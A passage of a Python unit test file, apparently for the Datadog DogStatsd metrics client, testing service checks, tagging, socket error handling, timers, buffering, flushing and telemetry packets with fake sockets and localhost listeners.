u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#bar:baz,foo|m:{2}'.format(self.statsd.WARNING, now, u\"♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n\")\n self.assert_equal_telemetry(\n check,\n self.recv(2, True),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(check),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.service_check(\n 'my_check.name', self.statsd.WARNING,\n tags=['key1:val1', 'key2:val2'], timestamp=now,\n hostname='i-abcd1234', message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\")\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2,bar:baz,foo|m:{2}'.format(self.statsd.WARNING, now, u\"♬ 
†øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪\\n\")\n self.assert_equal_telemetry(\n check,\n self.recv(2, True),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n tags=\"bar:baz,foo\",\n bytes_sent=len(check),\n ),\n )\n\n def test_metric_namespace(self):\n \"\"\"\n Namespace prefixes all metric names.\n \"\"\"\n self.statsd.namespace = \"foo\"\n self.statsd.gauge('gauge', 123.4)\n self.assert_equal_telemetry('foo.gauge:123.4|g\\n', self.recv(2))\n\n # Test Client level content tags\n def test_gauge_constant_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.gauge('gauge', 123.4)\n metric = 'gauge:123.4|g|#bar:baz,foo\\n'\n self.assert_equal_telemetry(metric, self.recv(2), telemetry=telemetry_metrics(tags=\"bar:baz,foo\", bytes_sent=len(metric)))\n\n def test_counter_constant_tag_with_metric_level_tags(self):\n self.statsd.constant_tags = ['bar:baz', 'foo']\n self.statsd.increment('page.views', tags=['extra'])\n metric = 'page.views:1|c|#extra,bar:baz,foo\\n'\n self.assert_equal_telemetry(metric, self.recv(2), telemetry=telemetry_metrics(tags=\"bar:baz,foo\", bytes_sent=len(metric)))\n\n def test_gauge_constant_tags_with_metric_level_tags_twice(self):\n metric_level_tag = ['foo:bar']\n self.statsd.constant_tags = ['bar:baz']\n self.statsd.gauge('gauge', 123.4, tags=metric_level_tag)\n metric = 'gauge:123.4|g|#foo:bar,bar:baz\\n'\n self.assert_equal_telemetry(\n metric,\n self.recv(2),\n telemetry=telemetry_metrics(\n tags=\"bar:baz\",\n bytes_sent=len(metric),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n # sending metrics multiple times with same metric-level tags\n # should not duplicate the tags being sent\n self.statsd.gauge('gauge', 123.4, tags=metric_level_tag)\n metric = 'gauge:123.4|g|#foo:bar,bar:baz\\n'\n self.assert_equal_telemetry(\n metric,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n tags=\"bar:baz\",\n bytes_sent=len(metric),\n ),\n )\n\n def test_socket_error(self):\n self.statsd.socket = BrokenSocket()\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n mock_log.warning.assert_called_once_with(\n \"Error submitting packet: %s, dropping the packet and closing the socket\",\n mock.ANY,\n )\n\n def test_socket_overflown(self):\n self.statsd.socket = OverflownSocket()\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [call(\"Socket send would block: %s, dropping the packet\", mock.ANY)]\n mock_log.debug.assert_has_calls(calls * 2)\n\n def test_socket_message_too_long(self):\n self.statsd.socket = BrokenSocket(error_number=errno.EMSGSIZE)\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [\n call(\n \"Packet size too big (size: %d): %s, dropping the packet\",\n mock.ANY,\n mock.ANY,\n ),\n ]\n mock_log.debug.assert_has_calls(calls * 2)\n\n def test_socket_no_buffer_space(self):\n self.statsd.socket = BrokenSocket(error_number=errno.ENOBUFS)\n with mock.patch(\"datadog.dogstatsd.base.log\") as mock_log:\n self.statsd.gauge('no error', 1)\n self.statsd.flush()\n\n mock_log.error.assert_not_called()\n calls = [call(\"Socket buffer full: %s, dropping the packet\", mock.ANY)]\n mock_log.debug.assert_has_calls(calls * 2)\n\n @patch('socket.socket')\n def 
test_uds_socket_ensures_min_receive_buffer(self, mock_socket_create):\n mock_socket = mock_socket_create.return_value\n mock_socket.setblocking.return_value = None\n mock_socket.connect.return_value = None\n mock_socket.getsockopt.return_value = MIN_SEND_BUFFER_SIZE / 2\n\n datadog = DogStatsd(socket_path=\"/fake/uds/socket/path\")\n datadog.gauge('some value', 1)\n datadog.flush()\n\n # Sanity check\n mock_socket_create.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM)\n\n mock_socket.setsockopt.assert_called_once_with(\n socket.SOL_SOCKET,\n socket.SO_SNDBUF,\n MIN_SEND_BUFFER_SIZE,\n )\n\n @patch('socket.socket')\n def test_udp_socket_ensures_min_receive_buffer(self, mock_socket_create):\n mock_socket = mock_socket_create.return_value\n mock_socket.setblocking.return_value = None\n mock_socket.connect.return_value = None\n mock_socket.getsockopt.return_value = MIN_SEND_BUFFER_SIZE / 2\n\n datadog = DogStatsd()\n datadog.gauge('some value', 1)\n datadog.flush()\n\n # Sanity check\n mock_socket_create.assert_called_once_with(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\n mock_socket.setsockopt.assert_called_once_with(\n socket.SOL_SOCKET,\n socket.SO_SNDBUF,\n MIN_SEND_BUFFER_SIZE,\n )\n\n def test_distributed(self):\n \"\"\"\n Measure the distribution of a function's run time using distribution custom metric.\n \"\"\"\n # In seconds\n @self.statsd.distributed('distributed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.1)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('d', type_)\n self.assertEqual('distributed.test', name)\n self.assert_almost_equal(0.1, float(value), 0.09)\n\n # Repeat, force timer value in milliseconds\n @self.statsd.distributed('distributed.test', use_ms=True)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n\n # Ignore telemetry packet\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0]\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('d', type_)\n self.assertEqual('distributed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_timed(self):\n \"\"\"\n Measure the distribution of a function's run time.\n \"\"\"\n # In seconds\n @self.statsd.timed('timed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n # Repeat, force timer value in milliseconds\n @self.statsd.timed('timed.test', use_ms=True)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, 
kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n self.statsd.flush()\n\n # Ignore telemetry packet\n packet = self.recv(2).split(\"\\n\")[0]\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_timed_in_ms(self):\n \"\"\"\n Timed value is reported in ms when statsd.use_ms is True.\n \"\"\"\n # Arm statsd to use_ms\n self.statsd.use_ms = True\n\n # Sample a function run time\n @self.statsd.timed('timed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n\n # Assess the packet\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n # Repeat, force timer value in seconds\n @self.statsd.timed('timed.test', use_ms=False)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n self.statsd.flush()\n\n packet = self.recv()\n name_value, type_ = packet.rstrip('\\n').split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_no_metric(self, ):\n \"\"\"\n Test using a decorator without providing a metric.\n \"\"\"\n\n @self.statsd.timed()\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('tests.unit.dogstatsd.test_statsd.func', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n @unittest.skipIf(not is_higher_py35(), reason=\"Coroutines are supported on Python 3.5 or higher.\")\n def test_timed_coroutine(self):\n \"\"\"\n Measure the distribution of a coroutine function's run time.\n\n Warning: Python > 3.5 only.\n \"\"\"\n import asyncio\n\n source = \"\"\"\n@self.statsd.timed('timed.test')\nasync def print_foo():\n \"docstring\"\n import time\n time.sleep(0.5)\n print(\"foo\")\n \"\"\"\n exec(source, {}, locals())\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(locals()['print_foo']())\n loop.close()\n\n # Assert\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_context(self):\n \"\"\"\n Measure the distribution of a context's run time.\n \"\"\"\n # In seconds\n with self.statsd.timed('timed_context.test') as timer:\n self.assertTrue(isinstance(timer, TimedContextManagerDecorator))\n time.sleep(0.5)\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n 
self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n self.assert_almost_equal(0.5, timer.elapsed, 0.1)\n\n # In milliseconds\n with self.statsd.timed('timed_context.test', use_ms=True) as timer:\n time.sleep(0.5)\n\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(500, float(value), 100)\n self.assert_almost_equal(500, timer.elapsed, 100)\n\n def test_timed_context_exception(self):\n \"\"\"\n Exception bubbles out of the `timed` context manager.\n \"\"\"\n class ContextException(Exception):\n pass\n\n def func(self):\n with self.statsd.timed('timed_context.test.exception'):\n time.sleep(0.5)\n raise ContextException()\n\n # Ensure the exception was raised.\n with pytest.raises(ContextException):\n func(self)\n\n # Ensure the timing was recorded.\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test.exception', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_context_no_metric_exception(self):\n \"\"\"Test that an exception occurs if using a context manager without a metric.\"\"\"\n\n def func(self):\n with self.statsd.timed():\n time.sleep(0.5)\n\n # Ensure the exception was raised.\n with pytest.raises(TypeError):\n func(self)\n\n # Ensure the timing was recorded.\n packet = self.statsd.socket.recv()\n self.assertIsNone(packet)\n\n def test_timed_start_stop_calls(self):\n # In seconds\n timer = self.statsd.timed('timed_context.test')\n timer.start()\n time.sleep(0.5)\n timer.stop()\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n # In milliseconds\n timer = self.statsd.timed('timed_context.test', use_ms=True)\n timer.start()\n time.sleep(0.5)\n timer.stop()\n\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_batching(self):\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.timing('timer', 123)\n self.statsd.close_buffer()\n expected = 'page.views:123|g\\ntimer:123|ms\\n'\n self.assert_equal_telemetry(\n expected,\n self.recv(2),\n telemetry=telemetry_metrics(metrics=2, bytes_sent=len(expected))\n )\n\n def test_flush(self):\n dogstatsd = DogStatsd(disable_buffering=False, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assertIsNone(fake_socket.recv(no_wait=True))\n dogstatsd.flush()\n self.assert_equal_telemetry('page.views:1|c\\n', fake_socket.recv(2))\n\n def test_flush_interval(self):\n dogstatsd = DogStatsd(disable_buffering=False, flush_interval=1, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n 
self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(0.3)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(1)\n self.assert_equal_telemetry(\n 'page.views:1|c\\n',\n fake_socket.recv(2, no_wait=True)\n )\n\n def test_disable_buffering(self):\n dogstatsd = DogStatsd(disable_buffering=True, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assert_equal_telemetry(\n 'page.views:1|c\\n',\n fake_socket.recv(2, no_wait=True)\n )\n\n def test_flush_disable(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n flush_interval=0,\n telemetry_min_flush_interval=0\n )\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(DEFAULT_FLUSH_INTERVAL)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(0.3)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n @unittest.skip(\"Buffering has been disabled again so the deprecation is not valid\")\n @patch(\"warnings.warn\")\n def test_manual_buffer_ops_deprecation(self, mock_warn):\n self.assertFalse(mock_warn.called)\n\n self.statsd.open_buffer()\n self.assertTrue(mock_warn.called)\n self.assertEqual(mock_warn.call_count, 1)\n\n self.statsd.close_buffer()\n self.assertEqual(mock_warn.call_count, 2)\n\n def test_batching_sequential(self):\n self.statsd.open_buffer()\n self.statsd.gauge('discarded.data', 123)\n self.statsd.close_buffer()\n\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.timing('timer', 123)\n self.statsd.close_buffer()\n\n expected1 = 'discarded.data:123|g\\n'\n expected_metrics1=telemetry_metrics(metrics=1, bytes_sent=len(expected1))\n self.assert_equal_telemetry(\n expected1,\n self.recv(2),\n telemetry=expected_metrics1)\n\n\n expected2 = 'page.views:123|g\\ntimer:123|ms\\n'\n self.assert_equal_telemetry(\n expected2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=2,\n packets_sent=2,\n bytes_sent=len(expected2 + expected_metrics1)\n )\n )\n\n def test_batching_runtime_changes(self):\n dogstatsd = DogStatsd(\n disable_buffering=True,\n telemetry_min_flush_interval=0\n )\n dogstatsd.socket = FakeSocket()\n\n # Send some unbuffered metrics and verify we got it immediately\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge', 123),\n ('timing', 'rt.timer', 123),\n ],\n )\n\n # Disable buffering (noop expected) and validate\n dogstatsd.disable_buffering = True\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge2', 321),\n ('timing', 'rt.timer2', 321),\n ],\n last_telemetry_size = last_telemetry_size,\n )\n\n # Enable buffering and validate\n dogstatsd.disable_buffering = False\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'buffered.gauge', 12345),\n ('timing', 'buffered.timer', 12345),\n ],\n last_telemetry_size = last_telemetry_size,\n buffered=True,\n )\n\n # Enable buffering again (another noop change expected)\n dogstatsd.disable_buffering = False\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'buffered.gauge2', 321),\n ('timing', 'buffered.timer2', 321),\n ],\n last_telemetry_size = last_telemetry_size,\n buffered=True,\n )\n\n # Flip the toggle to unbuffered functionality one more time and verify\n dogstatsd.disable_buffering = True\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge3', 
333),\n ('timing', 'rt.timer3', 333),\n ],\n last_telemetry_size = last_telemetry_size,\n )\n\n def test_threaded_batching(self):\n num_threads = 4\n threads = []\n\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n def batch_metrics(index, dsd):\n time.sleep(0.3 * index)\n\n dsd.open_buffer()\n\n time.sleep(0.1)\n dsd.gauge('page.%d.views' % index, 123)\n\n time.sleep(0.1)\n dsd.timing('timer.%d' % index, 123)\n\n time.sleep(0.5)\n dsd.close_buffer()\n\n for idx in range(num_threads):\n thread = Thread(\n name=\"{}_sender_thread_{}\".format(self.__class__.__name__, idx),\n target=batch_metrics,\n args=(idx, dogstatsd)\n )\n thread.daemon = True\n\n threads.append(thread)\n\n for thread in threads:\n thread.start()\n\n time.sleep(5)\n\n for thread in threads:\n if thread.is_alive():\n thread.join(0.1)\n\n previous_telemetry_packet_size = 0\n thread_idx = 0\n\n while thread_idx < num_threads:\n first_message = \"page.{}.views:123|g\\n\".format(thread_idx)\n first_message_len = len(first_message)\n second_message = \"timer.{}:123|ms\\n\".format(thread_idx)\n second_message_len = len(second_message)\n\n received_payload = fake_socket.recv(1)\n\n # Base assumption is that we got both messages but\n # we may get metrics split depending on when the flush thread triggers\n if received_payload == first_message:\n message = first_message\n packet_size = first_message_len\n num_metrics = 1\n elif received_payload == second_message:\n message = second_message\n packet_size = second_message_len\n num_metrics = 1\n thread_idx += 1\n else:\n message = first_message + second_message\n packet_size = len(message)\n num_metrics = 2\n thread_idx += 1\n\n self.assertEqual(received_payload, message)\n\n packet_sent = 2\n if previous_telemetry_packet_size == 0:\n packet_sent = 1\n\n bytes_sent = previous_telemetry_packet_size + packet_size\n telemetry = telemetry_metrics(\n metrics=num_metrics,\n bytes_sent=bytes_sent,\n packets_sent=packet_sent,\n )\n self.assertEqual(telemetry, fake_socket.recv(1))\n\n previous_telemetry_packet_size = len(telemetry)\n\n def test_telemetry(self):\n self.statsd.metrics_count = 1\n self.statsd.events_count = 2\n self.statsd.service_checks_count = 3\n self.statsd.bytes_sent = 4\n self.statsd.bytes_dropped_writer = 5\n self.statsd.packets_sent = 6\n self.statsd.packets_dropped_writer = 7\n self.statsd.bytes_dropped_queue = 8\n self.statsd.packets_dropped_queue = 9\n\n\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.close_buffer()\n\n payload = 'page.views:123|g\\n'\n telemetry = telemetry_metrics(metrics=2, events=2, service_checks=3, bytes_sent=4 + len(payload),\n bytes_dropped_writer=5, packets_sent=7, packets_dropped_writer=7, bytes_dropped_queue=8, packets_dropped_queue=9)\n\n self.assert_equal_telemetry(payload, self.recv(2), telemetry=telemetry)\n\n self.assertEqual(0, self.statsd.metrics_count)\n self.assertEqual(0, self.statsd.events_count)\n self.assertEqual(0, self.statsd.service_checks_count)\n self.assertEqual(len(telemetry), self.statsd.bytes_sent)\n self.assertEqual(0, self.statsd.bytes_dropped_writer)\n self.assertEqual(1, self.statsd.packets_sent)\n self.assertEqual(0, self.statsd.packets_dropped_writer)\n self.assertEqual(0, self.statsd.bytes_dropped_queue)\n self.assertEqual(0, self.statsd.packets_dropped_queue)\n\n def test_telemetry_flush_interval(self):\n dogstatsd = DogStatsd(disable_buffering=False)\n fake_socket = FakeSocket()\n dogstatsd.socket = 
fake_socket\n\n # Set the last flush time in the future to be sure we won't flush\n dogstatsd._last_flush_time = time.time() + dogstatsd._telemetry_flush_interval\n dogstatsd.gauge('gauge', 123.4)\n\n metric = 'gauge:123.4|g\\n'\n self.assertEqual(metric, fake_socket.recv())\n\n time1 = time.time()\n # Setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - dogstatsd._telemetry_flush_interval - 1\n dogstatsd.gauge('gauge', 123.4)\n self.assert_equal_telemetry(\n metric,\n fake_socket.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=2,\n bytes_sent=2*len(metric),\n packets_sent=2,\n ),\n )\n\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n def test_telemetry_flush_interval_alternate_destination(self):\n dogstatsd = DogStatsd(telemetry_host='foo')\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n fake_telemetry_socket = FakeSocket()\n dogstatsd.telemetry_socket = fake_telemetry_socket\n\n self.assertIsNotNone(dogstatsd.telemetry_host)\n self.assertIsNotNone(dogstatsd.telemetry_port)\n self.assertTrue(dogstatsd._dedicated_telemetry_destination())\n\n # set the last flush time in the future to be sure we won't flush\n dogstatsd._last_flush_time = time.time() + dogstatsd._telemetry_flush_interval\n dogstatsd.gauge('gauge', 123.4)\n\n self.assertEqual('gauge:123.4|g\\n', fake_socket.recv())\n\n time1 = time.time()\n # setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - dogstatsd._telemetry_flush_interval - 1\n dogstatsd.gauge('gauge', 123.4)\n\n self.assertEqual('gauge:123.4|g\\n', fake_socket.recv(reset_wait=True))\n self.assert_equal_telemetry(\n '',\n fake_telemetry_socket.recv(),\n telemetry=telemetry_metrics(\n metrics=2,\n bytes_sent=14*2,\n packets_sent=2,\n ),\n )\n\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n def test_telemetry_flush_interval_batch(self):\n dogstatsd = DogStatsd(disable_buffering=False)\n\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.open_buffer()\n dogstatsd.gauge('gauge1', 1)\n dogstatsd.gauge('gauge2', 2)\n\n time1 = time.time()\n # setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - dogstatsd._telemetry_flush_interval - 1\n\n dogstatsd.close_buffer()\n\n metric = 'gauge1:1|g\\ngauge2:2|g\\n'\n self.assert_equal_telemetry(metric, fake_socket.recv(2), telemetry=telemetry_metrics(metrics=2, bytes_sent=len(metric)))\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n\n def test_dedicated_udp_telemetry_dest(self):\n listener_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n listener_sock.bind(('localhost', 0))\n\n def wait_for_data():\n global udp_thread_telemetry_data\n udp_thread_telemetry_data = listener_sock.recvfrom(UDP_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n port = listener_sock.getsockname()[1]\n\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_host=\"localhost\",\n telemetry_port=port,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('abc')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(udp_thread_telemetry_data, expected_telemetry)\n\n def 
test_dedicated_udp6_telemetry_dest(self):\n listener_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n listener_sock.bind(('localhost', 0))\n\n def wait_for_data():\n global udp_thread_telemetry_data\n udp_thread_telemetry_data = listener_sock.recvfrom(UDP_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n port = listener_sock.getsockname()[1]\n\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_host=\"::1\", # use explicit address, localhost may resolve to v4.\n telemetry_port=port,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('abc')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(udp_thread_telemetry_data, expected_telemetry)\n\n def test_dedicated_uds_telemetry_dest(self):\n tempdir = tempfile.mkdtemp()\n socket_path = os.path.join(tempdir, 'socket.sock')\n\n listener_sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n listener_sock.bind(socket_path)\n\n def wait_for_data():\n global uds_thread_telemetry_data\n uds_thread_telemetry_data = listener_sock.recvfrom(UDS_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_socket_path=socket_path,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('def')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(uds_thread_telemetry_data, expected_telemetry)\n\n shutil.rmtree(tempdir)\n\n def test_context_manager(self):\n fake_socket = FakeSocket()\n with DogStatsd(telemetry_min_flush_interval=0) as dogstatsd:\n dogstatsd.socket = fake_socket\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n dogstatsd.increment('my_counter', 3)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"my_counter:3|c\"\n\n metrics = '\\n'.join([metric1, metric2, metric3]) + \"\\n\"\n self.assertEqual(metrics, fake_socket.recv(no_wait=True))\n\n metrics_packet = telemetry_metrics(\n metrics=3,\n bytes_sent=len(metrics),\n packets_sent=1,\n )\n self.assertEqual(metrics_packet, fake_socket.recv(no_wait=True))\n\n def test_context_manager_restores_enabled_buffering_state(self):\n fake_socket = FakeSocket()\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0, disable_buffering=False)\n dogstatsd.socket = fake_socket\n\n with dogstatsd:\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n\n dogstatsd.gauge('newpage.views', 123)\n dogstatsd.timing('newtimer', 123)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"newpage.views:123|g\"\n metric4 = \"newtimer:123|ms\"\n\n metrics1 = '\\n'.join([metric1, metric2]) + \"\\n\"\n self.assertEqual(metrics1, fake_socket.recv(no_wait=True))\n\n metrics_packet1 = telemetry_metrics(metrics=2, bytes_sent=len(metrics1), packets_sent=1)\n self.assertEqual(metrics_packet1, fake_socket.recv(no_wait=True))\n\n metrics2 = '\\n'.join([metric3, metric4]) + \"\\n\"\n metrics_packet2 = telemetry_metrics(metrics=2, bytes_sent=len(metrics_packet1 + metrics2), packets_sent=2)\n self.assertEqual(metrics2, fake_socket.recv(reset_wait=True))\n self.assertEqual(metrics_packet2, fake_socket.recv())\n\n def test_context_manager_restores_disabled_buffering_state(self):\n fake_socket = FakeSocket()\n 
